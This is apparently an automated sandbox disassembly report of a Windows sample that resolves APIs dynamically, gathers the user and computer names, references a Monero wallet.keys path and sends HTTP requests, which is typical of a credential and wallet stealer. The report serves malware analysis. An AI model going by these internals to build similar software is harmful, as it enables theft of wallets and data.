                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E24729
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E2475A
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E2474F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E246AC
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E245E8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E2471E
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E245F3
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E2473F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E24617
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E24622
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E24770
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E2466D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E24638
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E24734
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E246CD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E245D2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E24683
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E2462D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E24765
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E24643
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E24657
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: e527d7621de2fa9fb42486803d768f5d5805d2f898ab5f6d2faf34903ff7fc21
                        • Instruction ID: 0c6d47b1e92c60113c70e6273024afc9f6db32e9d852c024a76994b48c67f78a
                        • Opcode Fuzzy Hash: e527d7621de2fa9fb42486803d768f5d5805d2f898ab5f6d2faf34903ff7fc21
                        • Instruction Fuzzy Hash: BB41D3737C2704FBCE24BBACA84EE9DB7A65F46B04F50B956AC14A7281DAF05E004537
                        Function 00E24880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 801 e24880-e24942 call e3a7a0 call e247b0 call e3a740 * 5 InternetOpenA StrCmpCA 816 e24944 801->816 817 e2494b-e2494f 801->817 816->817 818 e24955-e24acd call e38b60 call e3a920 call e3a8a0 call e3a800 * 2 call e3a9b0 call e3a8a0 call e3a800 call e3a9b0 call e3a8a0 call e3a800 call e3a920 call e3a8a0 call e3a800 call e3a9b0 call e3a8a0 call e3a800 call e3a9b0 call e3a8a0 call e3a800 call e3a9b0 call e3a920 call e3a8a0 call e3a800 * 2 InternetConnectA 817->818 819 e24ecb-e24ef3 InternetCloseHandle call e3aad0 call e29ac0 817->819 818->819 905 e24ad3-e24ad7 818->905 828 e24f32-e24fa2 call e38990 * 2 call e3a7a0 call e3a800 * 8 819->828 829 e24ef5-e24f2d call e3a820 call e3a9b0 call e3a8a0 call e3a800 819->829 829->828 906 e24ae5 905->906 907 e24ad9-e24ae3 905->907 908 e24aef-e24b22 HttpOpenRequestA 906->908 907->908 909 e24b28-e24e28 call e3a9b0 call e3a8a0 call e3a800 call e3a920 call e3a8a0 call e3a800 call e3a9b0 call e3a8a0 call e3a800 call e3a9b0 call e3a8a0 call e3a800 call e3a9b0 call e3a8a0 call e3a800 call e3a9b0 call e3a8a0 call e3a800 call e3a920 call e3a8a0 call e3a800 call e3a9b0 call e3a8a0 call e3a800 call e3a9b0 call e3a8a0 call e3a800 call e3a920 call e3a8a0 call e3a800 call e3a9b0 call e3a8a0 call e3a800 call e3a9b0 call e3a8a0 call e3a800 call e3a9b0 call e3a8a0 call e3a800 call e3a9b0 call e3a8a0 call e3a800 call e3a920 call e3a8a0 call e3a800 call e3a740 call e3a920 * 2 call e3a8a0 call e3a800 * 2 call e3aad0 lstrlen call e3aad0 * 2 lstrlen call e3aad0 HttpSendRequestA 908->909 910 e24ebe-e24ec5 InternetCloseHandle 908->910 1021 e24e32-e24e5c InternetReadFile 909->1021 910->819 1022 e24e67-e24eb9 InternetCloseHandle call e3a800 1021->1022 1023 e24e5e-e24e65 1021->1023 1022->910 1023->1022 1024 e24e69-e24ea7 call e3a9b0 call e3a8a0 call e3a800 1023->1024 1024->1021
                        APIs
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E24839
                          • Part of subcall function 00E247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E24849
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E24915
                        • StrCmpCA.SHLWAPI(?,0196FA58), ref: 00E2493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E24ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E40DDB,00000000,?,?,00000000,?,",00000000,?,0196FAD8), ref: 00E24DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E24E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E24E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E24E49
                        • InternetCloseHandle.WININET(00000000), ref: 00E24EAD
                        • InternetCloseHandle.WININET(00000000), ref: 00E24EC5
                        • HttpOpenRequestA.WININET(00000000,0196F988,?,0196F4B0,00000000,00000000,00400100,00000000), ref: 00E24B15
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                        • InternetCloseHandle.WININET(00000000), ref: 00E24ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: 8e6ac8d9cdf33d2d1b37ab50dfff8e6b257d52daa3481ffcbbfa2418fbdf7948
                        • Instruction ID: 640d4806f3e1303ab51d60dbd7a5b06c5a378720be8746f3a3ef6eb937e123a4
                        • Opcode Fuzzy Hash: 8e6ac8d9cdf33d2d1b37ab50dfff8e6b257d52daa3481ffcbbfa2418fbdf7948
                        • Instruction Fuzzy Hash: 33120E72910218AADB18EB50DC9AFEEBBB8BF54300F5451A9F14672091DF342F89CF61
                        Function 00E378E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E37910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E37917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 00E3792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 0759f11ae5fa6bde69e8051921d604202aab98f3270a885ca7c57f0b77b55fa1
                        • Instruction ID: 88aa03b10a044997a767d4a8d462ba8dd756df2b7d308d2daf3e1db364040847
                        • Opcode Fuzzy Hash: 0759f11ae5fa6bde69e8051921d604202aab98f3270a885ca7c57f0b77b55fa1
                        • Instruction Fuzzy Hash: 170186B1A08204EFC750DF94D949BAABBB8F744B21F104219FA85F7280C3795900CBA1
                        Function 00E37850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E211B7), ref: 00E37880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E37887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E3789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: 37273a727f517278a2182a1d62e3fcdcd0813d11d4ad1f6fdf6dc671561dd89e
                        • Instruction ID: cc5f50e0519e9cadcc374c5c41708c5de9e7fb309ed7526904b01298ba219906
                        • Opcode Fuzzy Hash: 37273a727f517278a2182a1d62e3fcdcd0813d11d4ad1f6fdf6dc671561dd89e
                        • Instruction Fuzzy Hash: 07F04FB1E44209EFC714DF98DD49BAEFBB8FB08721F10025AFA45A3680C7791504CBA1
                        Function 00E21160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 1a4cbad52d01c62a388c8e59faa3b01a4ae48e307004feaf3a8bec9030fe8923
                        • Instruction ID: d0bb43b28103d47b78c49478010261bc147af6902123d9dad327a60144ff46e2
                        • Opcode Fuzzy Hash: 1a4cbad52d01c62a388c8e59faa3b01a4ae48e307004feaf3a8bec9030fe8923
                        • Instruction Fuzzy Hash: E2D05E74A0030CDBCB10EFE0D84A6DDBB78FB08311F001594D90673340EA359591CBA5
                        Function 00E39C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 633 e39c10-e39c1a 634 e39c20-e3a031 GetProcAddress * 43 633->634 635 e3a036-e3a0ca LoadLibraryA * 8 633->635 634->635 636 e3a146-e3a14d 635->636 637 e3a0cc-e3a141 GetProcAddress * 5 635->637 638 e3a153-e3a211 GetProcAddress * 8 636->638 639 e3a216-e3a21d 636->639 637->636 638->639 640 e3a298-e3a29f 639->640 641 e3a21f-e3a293 GetProcAddress * 5 639->641 642 e3a337-e3a33e 640->642 643 e3a2a5-e3a332 GetProcAddress * 6 640->643 641->640 644 e3a344-e3a41a GetProcAddress * 9 642->644 645 e3a41f-e3a426 642->645 643->642 644->645 646 e3a4a2-e3a4a9 645->646 647 e3a428-e3a49d GetProcAddress * 5 645->647 648 e3a4ab-e3a4d7 GetProcAddress * 2 646->648 649 e3a4dc-e3a4e3 646->649 647->646 648->649 650 e3a515-e3a51c 649->650 651 e3a4e5-e3a510 GetProcAddress * 2 649->651 652 e3a612-e3a619 650->652 653 e3a522-e3a60d GetProcAddress * 10 650->653 651->650 654 e3a61b-e3a678 GetProcAddress * 4 652->654 655 e3a67d-e3a684 652->655 653->652 654->655 656 e3a686-e3a699 GetProcAddress 655->656 657 e3a69e-e3a6a5 655->657 656->657 658 e3a6a7-e3a703 GetProcAddress * 4 657->658 659 e3a708-e3a709 657->659 658->659
                        APIs
                        • GetProcAddress.KERNEL32(76210000,01956418), ref: 00E39C2D
                        • GetProcAddress.KERNEL32(76210000,01956618), ref: 00E39C45
                        • GetProcAddress.KERNEL32(76210000,01969000), ref: 00E39C5E
                        • GetProcAddress.KERNEL32(76210000,01969030), ref: 00E39C76
                        • GetProcAddress.KERNEL32(76210000,01969048), ref: 00E39C8E
                        • GetProcAddress.KERNEL32(76210000,0196D968), ref: 00E39CA7
                        • GetProcAddress.KERNEL32(76210000,0195A4C0), ref: 00E39CBF
                        • GetProcAddress.KERNEL32(76210000,0196D860), ref: 00E39CD7
                        • GetProcAddress.KERNEL32(76210000,0196D980), ref: 00E39CF0
                        • GetProcAddress.KERNEL32(76210000,0196D9F8), ref: 00E39D08
                        • GetProcAddress.KERNEL32(76210000,0196D8C0), ref: 00E39D20
                        • GetProcAddress.KERNEL32(76210000,01956458), ref: 00E39D39
                        • GetProcAddress.KERNEL32(76210000,019566B8), ref: 00E39D51
                        • GetProcAddress.KERNEL32(76210000,01956698), ref: 00E39D69
                        • GetProcAddress.KERNEL32(76210000,01956738), ref: 00E39D82
                        • GetProcAddress.KERNEL32(76210000,0196D8D8), ref: 00E39D9A
                        • GetProcAddress.KERNEL32(76210000,0196DA10), ref: 00E39DB2
                        • GetProcAddress.KERNEL32(76210000,0195A768), ref: 00E39DCB
                        • GetProcAddress.KERNEL32(76210000,01956778), ref: 00E39DE3
                        • GetProcAddress.KERNEL32(76210000,0196D9E0), ref: 00E39DFB
                        • GetProcAddress.KERNEL32(76210000,0196DA28), ref: 00E39E14
                        • GetProcAddress.KERNEL32(76210000,0196DA40), ref: 00E39E2C
                        • GetProcAddress.KERNEL32(76210000,0196D848), ref: 00E39E44
                        • GetProcAddress.KERNEL32(76210000,01956578), ref: 00E39E5D
                        • GetProcAddress.KERNEL32(76210000,0196D890), ref: 00E39E75
                        • GetProcAddress.KERNEL32(76210000,0196DA58), ref: 00E39E8D
                        • GetProcAddress.KERNEL32(76210000,0196DA70), ref: 00E39EA6
                        • GetProcAddress.KERNEL32(76210000,0196D920), ref: 00E39EBE
                        • GetProcAddress.KERNEL32(76210000,0196D830), ref: 00E39ED6
                        • GetProcAddress.KERNEL32(76210000,0196DA88), ref: 00E39EEF
                        • GetProcAddress.KERNEL32(76210000,0196DAA0), ref: 00E39F07
                        • GetProcAddress.KERNEL32(76210000,0196DAB8), ref: 00E39F1F
                        • GetProcAddress.KERNEL32(76210000,0196D878), ref: 00E39F38
                        • GetProcAddress.KERNEL32(76210000,0195FE30), ref: 00E39F50
                        • GetProcAddress.KERNEL32(76210000,0196D938), ref: 00E39F68
                        • GetProcAddress.KERNEL32(76210000,0196DAD0), ref: 00E39F81
                        • GetProcAddress.KERNEL32(76210000,019564F8), ref: 00E39F99
                        • GetProcAddress.KERNEL32(76210000,0196DB00), ref: 00E39FB1
                        • GetProcAddress.KERNEL32(76210000,019564B8), ref: 00E39FCA
                        • GetProcAddress.KERNEL32(76210000,0196DAE8), ref: 00E39FE2
                        • GetProcAddress.KERNEL32(76210000,0196DB18), ref: 00E39FFA
                        • GetProcAddress.KERNEL32(76210000,019564D8), ref: 00E3A013
                        • GetProcAddress.KERNEL32(76210000,01956518), ref: 00E3A02B
                        • LoadLibraryA.KERNEL32(0196D8A8,?,00E35CA3,00E40AEB,?,?,?,?,?,?,?,?,?,?,00E40AEA,00E40AE3), ref: 00E3A03D
                        • LoadLibraryA.KERNEL32(0196D8F0,?,00E35CA3,00E40AEB,?,?,?,?,?,?,?,?,?,?,00E40AEA,00E40AE3), ref: 00E3A04E
                        • LoadLibraryA.KERNEL32(0196D908,?,00E35CA3,00E40AEB,?,?,?,?,?,?,?,?,?,?,00E40AEA,00E40AE3), ref: 00E3A060
                        • LoadLibraryA.KERNEL32(0196D950,?,00E35CA3,00E40AEB,?,?,?,?,?,?,?,?,?,?,00E40AEA,00E40AE3), ref: 00E3A072
                        • LoadLibraryA.KERNEL32(0196D998,?,00E35CA3,00E40AEB,?,?,?,?,?,?,?,?,?,?,00E40AEA,00E40AE3), ref: 00E3A083
                        • LoadLibraryA.KERNEL32(0196D9B0,?,00E35CA3,00E40AEB,?,?,?,?,?,?,?,?,?,?,00E40AEA,00E40AE3), ref: 00E3A095
